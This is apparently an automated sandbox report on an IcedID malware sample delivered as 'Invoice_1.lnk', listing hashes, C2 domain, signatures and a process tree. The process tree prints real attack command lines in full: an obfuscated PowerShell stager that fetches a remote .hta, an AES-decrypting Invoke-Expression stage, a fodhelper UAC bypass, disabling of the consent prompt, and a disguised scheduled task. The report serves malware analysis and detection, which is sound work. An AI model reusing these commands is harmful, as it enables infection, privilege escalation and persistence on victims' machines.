Analysis
- max time kernel: 71s
- max time network: 136s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 24-05-2022 14:15

Static task: static1
Behavioral task: behavioral1
- Sample: Invoice_1.lnk
- Resource: win7-20220414-en
General
- Target: Invoice_1.lnk
- Size: 2KB
- MD5: c00c67f3de031c5ae198ba0362b5dd01
- SHA1: 40f3b0263f8fccdf1fd5fe287dbd55829a8eddd6
- SHA256: d146c8bc52ec74b67704b30c0fb20995ba65770d191502f70c88c262dc44fc5d
- SHA512: 4944aa5947667500eddb4d7fed5b0a8eb4d14db1d60496fcbe38c4032511b04c92757807a23dff49353f5ee75a5ed44cc5de9ed7cdcd12b59a7b8c9214e227ad
Malware Config
Extracted
- https://conderadio.tv/09872574.hta
Extracted
- Family: icedid
- Campaign: 109932505
- C2: ilekvoyn.com
Signatures
- suricata: ET MALWARE Win32/IcedID Request Cookie
- suricata: ET MALWARE Win32/IcedID Request Cookie
- Blocklisted process makes network request (4 IoCs)
  Processes (flow / pid / process):
  - 8 / 4692 / mshta.exe
  - 10 / 4692 / mshta.exe
  - 24 / 4620 / powershell.exe
  - 40 / 3780 / Rundll32.exe
- Downloads MZ/PE file
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes (description / ioc / process):
  - Key value queried / \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation / cmd.exe
  - Key value queried / \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation / mshta.exe
- Loads dropped DLL (1 IoC)
  Processes (pid / process):
  - 3780 / Rundll32.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Modifies registry class (11 IoCs)
  Processes (description / ioc / process):
  - Key created / \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\Shell\Open / powershell.exe
  - Set value (str) / \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\Shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ZDqcC.bat" / powershell.exe
  - Key deleted / \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\Shell\Open\command / powershell.exe
  - Key deleted / \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\Shell / powershell.exe
  - Set value (str) / \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\Shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kywdT.bat" / powershell.exe
  - Key created / \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings / powershell.exe
  - Key created / \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\Shell / powershell.exe
  - Set value (str) / \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute / powershell.exe
  - Key deleted / \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\Shell\Open / powershell.exe
  - Key deleted / \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings / powershell.exe
  - Key created / \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\Shell\Open\command / powershell.exe
- Modifies system certificate store (2 IoCs)
  Processes (description / ioc / process):
  - Key created / \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 / mshta.exe
  - Set value (data) / \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e / mshta.exe
- Suspicious behavior: EnumeratesProcesses (10 IoCs)
  Processes (pid / process):
  - 3452 / powershell.exe
  - 3452 / powershell.exe
  - 4620 / powershell.exe
  - 4620 / powershell.exe
  - 3420 / powershell.exe
  - 3420 / powershell.exe
  - 1272 / powershell.exe
  - 1272 / powershell.exe
  - 3780 / Rundll32.exe
  - 3780 / Rundll32.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (description / pid / process):
  - Token: SeDebugPrivilege / 3452 / powershell.exe
  - Token: SeDebugPrivilege / 4620 / powershell.exe
  - Token: SeDebugPrivilege / 3420 / powershell.exe
  - Token: SeDebugPrivilege / 1272 / powershell.exe
  - Token: SeIncreaseQuotaPrivilege / 1272 / powershell.exe
  - Token: SeSecurityPrivilege / 1272 / powershell.exe
  - Token: SeTakeOwnershipPrivilege / 1272 / powershell.exe
  - Token: SeLoadDriverPrivilege / 1272 / powershell.exe
  - Token: SeSystemProfilePrivilege / 1272 / powershell.exe
  - Token: SeSystemtimePrivilege / 1272 / powershell.exe
  - Token: SeProfSingleProcessPrivilege / 1272 / powershell.exe
  - Token: SeIncBasePriorityPrivilege / 1272 / powershell.exe
  - Token: SeCreatePagefilePrivilege / 1272 / powershell.exe
  - Token: SeBackupPrivilege / 1272 / powershell.exe
  - Token: SeRestorePrivilege / 1272 / powershell.exe
  - Token: SeShutdownPrivilege / 1272 / powershell.exe
  - Token: SeDebugPrivilege / 1272 / powershell.exe
  - Token: SeSystemEnvironmentPrivilege / 1272 / powershell.exe
  - Token: SeRemoteShutdownPrivilege / 1272 / powershell.exe
  - Token: SeUndockPrivilege / 1272 / powershell.exe
  - Token: SeManageVolumePrivilege / 1272 / powershell.exe
  - Token: 33 / 1272 / powershell.exe
  - Token: 34 / 1272 / powershell.exe
  - Token: 35 / 1272 / powershell.exe
  - Token: 36 / 1272 / powershell.exe
  - Token: SeIncreaseQuotaPrivilege / 1272 / powershell.exe
  - Token: SeSecurityPrivilege / 1272 / powershell.exe
  - Token: SeTakeOwnershipPrivilege / 1272 / powershell.exe
  - Token: SeLoadDriverPrivilege / 1272 / powershell.exe
  - Token: SeSystemProfilePrivilege / 1272 / powershell.exe
  - Token: SeSystemtimePrivilege / 1272 / powershell.exe
  - Token: SeProfSingleProcessPrivilege / 1272 / powershell.exe
  - Token: SeIncBasePriorityPrivilege / 1272 / powershell.exe
  - Token: SeCreatePagefilePrivilege / 1272 / powershell.exe
  - Token: SeBackupPrivilege / 1272 / powershell.exe
  - Token: SeRestorePrivilege / 1272 / powershell.exe
  - Token: SeShutdownPrivilege / 1272 / powershell.exe
  - Token: SeDebugPrivilege / 1272 / powershell.exe
  - Token: SeSystemEnvironmentPrivilege / 1272 / powershell.exe
  - Token: SeRemoteShutdownPrivilege / 1272 / powershell.exe
  - Token: SeUndockPrivilege / 1272 / powershell.exe
  - Token: SeManageVolumePrivilege / 1272 / powershell.exe
  - Token: 33 / 1272 / powershell.exe
  - Token: 34 / 1272 / powershell.exe
  - Token: 35 / 1272 / powershell.exe
  - Token: 36 / 1272 / powershell.exe
  - Token: SeIncreaseQuotaPrivilege / 1272 / powershell.exe
  - Token: SeSecurityPrivilege / 1272 / powershell.exe
  - Token: SeTakeOwnershipPrivilege / 1272 / powershell.exe
  - Token: SeLoadDriverPrivilege / 1272 / powershell.exe
  - Token: SeSystemProfilePrivilege / 1272 / powershell.exe
  - Token: SeSystemtimePrivilege / 1272 / powershell.exe
  - Token: SeProfSingleProcessPrivilege / 1272 / powershell.exe
  - Token: SeIncBasePriorityPrivilege / 1272 / powershell.exe
  - Token: SeCreatePagefilePrivilege / 1272 / powershell.exe
  - Token: SeBackupPrivilege / 1272 / powershell.exe
  - Token: SeRestorePrivilege / 1272 / powershell.exe
  - Token: SeShutdownPrivilege / 1272 / powershell.exe
  - Token: SeDebugPrivilege / 1272 / powershell.exe
  - Token: SeSystemEnvironmentPrivilege / 1272 / powershell.exe
  - Token: SeRemoteShutdownPrivilege / 1272 / powershell.exe
  - Token: SeUndockPrivilege / 1272 / powershell.exe
  - Token: SeManageVolumePrivilege / 1272 / powershell.exe
  - Token: 33 / 1272 / powershell.exe
- Suspicious use of FindShellTrayWindow (1 IoC)
  Processes (pid / process):
  - 3780 / Rundll32.exe
- Suspicious use of WriteProcessMemory (26 IoCs)
  Processes (description / pid / process / target process):
  - PID 1640 wrote to memory of 3452 / 1640 / cmd.exe / powershell.exe
  - PID 1640 wrote to memory of 3452 / 1640 / cmd.exe / powershell.exe
  - PID 3452 wrote to memory of 4692 / 3452 / powershell.exe / mshta.exe
  - PID 3452 wrote to memory of 4692 / 3452 / powershell.exe / mshta.exe
  - PID 4692 wrote to memory of 4620 / 4692 / mshta.exe / powershell.exe
  - PID 4692 wrote to memory of 4620 / 4692 / mshta.exe / powershell.exe
  - PID 4620 wrote to memory of 1964 / 4620 / powershell.exe / fodhelper.exe
  - PID 4620 wrote to memory of 1964 / 4620 / powershell.exe / fodhelper.exe
  - PID 1964 wrote to memory of 4896 / 1964 / fodhelper.exe / cmd.exe
  - PID 1964 wrote to memory of 4896 / 1964 / fodhelper.exe / cmd.exe
  - PID 4896 wrote to memory of 2004 / 4896 / cmd.exe / cmd.exe
  - PID 4896 wrote to memory of 2004 / 4896 / cmd.exe / cmd.exe
  - PID 2004 wrote to memory of 3420 / 2004 / cmd.exe / powershell.exe
  - PID 2004 wrote to memory of 3420 / 2004 / cmd.exe / powershell.exe
  - PID 2004 wrote to memory of 3464 / 2004 / cmd.exe / cmd.exe
  - PID 2004 wrote to memory of 3464 / 2004 / cmd.exe / cmd.exe
  - PID 4620 wrote to memory of 4092 / 4620 / powershell.exe / fodhelper.exe
  - PID 4620 wrote to memory of 4092 / 4620 / powershell.exe / fodhelper.exe
  - PID 4092 wrote to memory of 4760 / 4092 / fodhelper.exe / cmd.exe
  - PID 4092 wrote to memory of 4760 / 4092 / fodhelper.exe / cmd.exe
  - PID 4760 wrote to memory of 3148 / 4760 / cmd.exe / cmd.exe
  - PID 4760 wrote to memory of 3148 / 4760 / cmd.exe / cmd.exe
  - PID 3148 wrote to memory of 1272 / 3148 / cmd.exe / powershell.exe
  - PID 3148 wrote to memory of 1272 / 3148 / cmd.exe / powershell.exe
  - PID 3148 wrote to memory of 2160 / 3148 / cmd.exe / cmd.exe
  - PID 3148 wrote to memory of 2160 / 3148 / cmd.exe / cmd.exe
Processes (process tree; nesting shows the parent/child depth recorded by the sandbox)
- [depth 1] C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\Invoice_1.lnk
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" <#oeE'}tV41O#>$zfkmQNMMGKcDTdJr=@(30802,30808,30797,30809,30790,30725,30797,30809,30809,30805,30808,30751,30740,30740,30792,30804,30803,30793,30794,30807,30790,30793,30798,30804,30739,30809,30811,30740,30741,30750,30749,30748,30743,30746,30748,30745,30739,30797,30809,30790);<#oeE'}tV41O#>$JxXPDMbtIHLsflxCnW=@(30766,30762,30781);<#oeE'}tV41O#>function najjGYpeT($gNCFLP){$KeafQvWRzpQ=30693;<#oeE'}tV41O#>$GDaRsn=$Null;foreach($jimJcuhW in $gNCFLP){$GDaRsn+=[char]($jimJcuhW-$KeafQvWRzpQ)};return $GDaRsn};sal pQtoDlBENz (najjGYpeT $JxXPDMbtIHLsflxCnW);<#oeE'}tV41O#>pQtoDlBENz((najjGYpeT $zfkmQNMMGKcDTdJr));
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [depth 3] C:\Windows\system32\mshta.exe
      Command line: "C:\Windows\system32\mshta.exe" https://conderadio.tv/09872574.hta
      - Blocklisted process makes network request
      - Checks computer location settings
      - Modifies system certificate store
      - Suspicious use of WriteProcessMemory
      - [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $ekPb = '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';$tPFOxUIgHD = 'U3FHZEtYZHBWcHZaQ09TR1JSell1ZmhUWktOemhReEc=';$CBMKxSfhg = New-Object 'System.Security.Cryptography.AesManaged';$CBMKxSfhg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CBMKxSfhg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CBMKxSfhg.BlockSize = 128;$CBMKxSfhg.KeySize = 256;$CBMKxSfhg.Key = [System.Convert]::FromBase64String($tPFOxUIgHD);$ddnEW = [System.Convert]::FromBase64String($ekPb);$kAbSPqMWQ = $ddnEW[0..15];$CBMKxSfhg.IV = $kAbSPqMWQ;$AUXAiVjEXOpkNt = $CBMKxSfhg.CreateDecryptor();$XPnBMtsJXxDfbSw = $AUXAiVjEXOpkNt.TransformFinalBlock($ddnEW, 16, $ddnEW.Length - 16);$CBMKxSfhg.Dispose();$GDDbozdXrwaw = New-Object System.IO.MemoryStream( , $XPnBMtsJXxDfbSw );$DuRHh = New-Object System.IO.MemoryStream;$qYlxsgnfBTqatvQswW = New-Object System.IO.Compression.GzipStream $GDDbozdXrwaw, ([IO.Compression.CompressionMode]::Decompress);$qYlxsgnfBTqatvQswW.CopyTo( $DuRHh );$qYlxsgnfBTqatvQswW.Close();$GDDbozdXrwaw.Close();[byte[]] $qDmVNkk = $DuRHh.ToArray();$liVTzN = [System.Text.Encoding]::UTF8.GetString($qDmVNkk);Invoke-Expression($liVTzN)
        - Blocklisted process makes network request
        - Modifies registry class
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        - [depth 5] C:\Windows\System32\fodhelper.exe
          Command line: "C:\Windows\System32\fodhelper.exe"
          - Suspicious use of WriteProcessMemory
          - [depth 6] C:\Windows\system32\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat" "
            - Suspicious use of WriteProcessMemory
            - [depth 7] C:\Windows\system32\cmd.exe
              Command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat" *
              - Suspicious use of WriteProcessMemory
              - [depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Command line: powershell.exe -ExecutionPolicy UnRestricted Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
              - [depth 8] C:\Windows\system32\cmd.exe
                Command line: cmd /c del "C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat"
        - [depth 5] C:\Windows\System32\fodhelper.exe
          Command line: "C:\Windows\System32\fodhelper.exe"
          - Suspicious use of WriteProcessMemory
          - [depth 6] C:\Windows\system32\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kywdT.bat" "
            - Suspicious use of WriteProcessMemory
            - [depth 7] C:\Windows\system32\cmd.exe
              Command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\kywdT.bat" *
              - Suspicious use of WriteProcessMemory
              - [depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Command line: powershell.exe function tXIPlkvsktLPL ($hyUQNAjDGWycUo){ $mXzmkJZcEjqHY = 'Core update check'; $MAVXCzBKIjuPJeFnAJ = @{ Action = (New-ScheduledTaskAction -Execute "Rundll32.exe" -Argument ' C:\Users\Admin\AppData\Local\Temp\1.dll,DllRegisterServer'); Trigger = (New-ScheduledTaskTrigger -Once -At(Get-Date).AddSeconds(5)); TaskName = $mXzmkJZcEjqHY; Description = 'Core updating process.'; TaskPath = 'UpdateCheck'; RunLevel = 'Highest'}; Register-ScheduledTask @MAVXCzBKIjuPJeFnAJ -Force}; tXIPlkvsktLPL C:\Users\Admin\AppData\Local\Temp\1.dll
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
              - [depth 8] C:\Windows\system32\cmd.exe
                Command line: cmd /c del "C:\Users\Admin\AppData\Local\Temp\kywdT.bat"
- [depth 1] C:\Windows\system32\Rundll32.exe
  Command line: Rundll32.exe C:\Users\Admin\AppData\Local\Temp\1.dll,DllRegisterServer
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
  SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
  SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
  SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 45c815f0a0e10f75c450369e5b8673f9
  SHA1: b3f8e50200afefd0e4c271c3de84ef4d93c5f6c9
  SHA256: 4bd75d9f94626d1a4b514515dfa9c1abfca3d5a1a36f4d1f0dfb8489db453a97
  SHA512: 0120c1f3c501c0630c931f873794f6c7ef1e87216b95aaf76479dfff1614020a7de38c62a24f92a82ae1b0a55b041308d24390b6f556c62d535bef938e4f6974
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 331841fe482ffe8b1cc1509733d8ca67
  SHA1: 1e3257cca1b2c7c3aaf4cf1f138c9e9e665e8cb8
  SHA256: 14112a43248df71bdf7668c923f541190c6417ef37796605cf8114f565648d0f
  SHA512: 039e5991132912f94b3fbe23146ee61bb822aada6a3f2b37bca226c76c162e04a106f3626587ff079411a03e6e9a4813ad04813ada4694f9b78f49e1925389d9
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 331841fe482ffe8b1cc1509733d8ca67
  SHA1: 1e3257cca1b2c7c3aaf4cf1f138c9e9e665e8cb8
  SHA256: 14112a43248df71bdf7668c923f541190c6417ef37796605cf8114f565648d0f
  SHA512: 039e5991132912f94b3fbe23146ee61bb822aada6a3f2b37bca226c76c162e04a106f3626587ff079411a03e6e9a4813ad04813ada4694f9b78f49e1925389d9
- C:\Users\Admin\AppData\Local\Temp\1.dll
  Filesize: 718KB
  MD5: 5a0e570b13623c79c9261a8a2cc41f04
  SHA1: 10f6f208907d25f5ec39060a8576ed8387d42c0e
  SHA256: 3dfe63d2c9a7e2f848d2f92171cc577158318b4e9cb62e74ec603be84ba13109
  SHA512: bbe98f12bbcc0820b98c329df11b20ee69cf49300c31948462978b5d9b398f62374bd2075247c87c3f916ceae89ba1e7a8bd0b76b1e3747345f12f5cb25e2c70
- C:\Users\Admin\AppData\Local\Temp\1.dll
  Filesize: 718KB
  MD5: 5a0e570b13623c79c9261a8a2cc41f04
  SHA1: 10f6f208907d25f5ec39060a8576ed8387d42c0e
  SHA256: 3dfe63d2c9a7e2f848d2f92171cc577158318b4e9cb62e74ec603be84ba13109
  SHA512: bbe98f12bbcc0820b98c329df11b20ee69cf49300c31948462978b5d9b398f62374bd2075247c87c3f916ceae89ba1e7a8bd0b76b1e3747345f12f5cb25e2c70
- C:\Users\Admin\AppData\Local\Temp\ZDqcC.bat
  Filesize: 343B
  MD5: 8ca0985471c9c17826fab97b90f90c2e
  SHA1: 6dfd1040096a2215be242e4392d7a2768d067f10
  SHA256: f9a6e829c29a8411f88db8a26edc1fafe70c64b0df651ad359ca944b14a17781
  SHA512: 539d65d7e7676e3a030de37e1339c2ddb0077db3242d42e6497c66f1bc8f9fc60a00150d8c29ade40c6845e1733f4f2d4cb9f830d09969676f1d24834767cefb
- C:\Users\Admin\AppData\Local\Temp\kywdT.bat
  Filesize: 692B
  MD5: a9338ee7f2e9643871e016eda0ecbe1f
  SHA1: 66c6dc3bcd948645774778263e7c8069e340e704
  SHA256: c3eecc22513eb86b258dc0bfe97a599c9c5673d86fb2d2b286a88d113f076813
  SHA512: 7cb76b9cfdb41e3640bbec245324ba4c05757c84d0dec7d36320ce6836a2a7868727a7add4b0b49e9126f6b3233d18c2e31649ef4015769248f6101211f4853f
- memory/1272-153-0x00007FFC2C480000-0x00007FFC2CF41000-memory.dmp
  Filesize: 10.8MB
- memory/1272-150-0x0000000000000000-mapping.dmp
- memory/1964-139-0x0000000000000000-mapping.dmp
- memory/2004-142-0x0000000000000000-mapping.dmp
- memory/2160-154-0x0000000000000000-mapping.dmp
- memory/3148-149-0x0000000000000000-mapping.dmp
- memory/3420-143-0x0000000000000000-mapping.dmp
- memory/3420-144-0x00007FFC2C480000-0x00007FFC2CF41000-memory.dmp
  Filesize: 10.8MB
- memory/3452-130-0x0000000000000000-mapping.dmp
- memory/3452-132-0x00007FFC2E530000-0x00007FFC2EFF1000-memory.dmp
  Filesize: 10.8MB
- memory/3452-131-0x00000225DE9F0000-0x00000225DEA12000-memory.dmp
  Filesize: 136KB
- memory/3464-145-0x0000000000000000-mapping.dmp
- memory/3780-157-0x0000000180000000-0x0000000180009000-memory.dmp
  Filesize: 36KB
- memory/4092-146-0x0000000000000000-mapping.dmp
- memory/4620-137-0x00007FFC2C480000-0x00007FFC2CF41000-memory.dmp
  Filesize: 10.8MB
- memory/4620-135-0x0000000000000000-mapping.dmp
- memory/4692-133-0x0000000000000000-mapping.dmp
- memory/4760-147-0x0000000000000000-mapping.dmp
- memory/4896-140-0x0000000000000000-mapping.dmp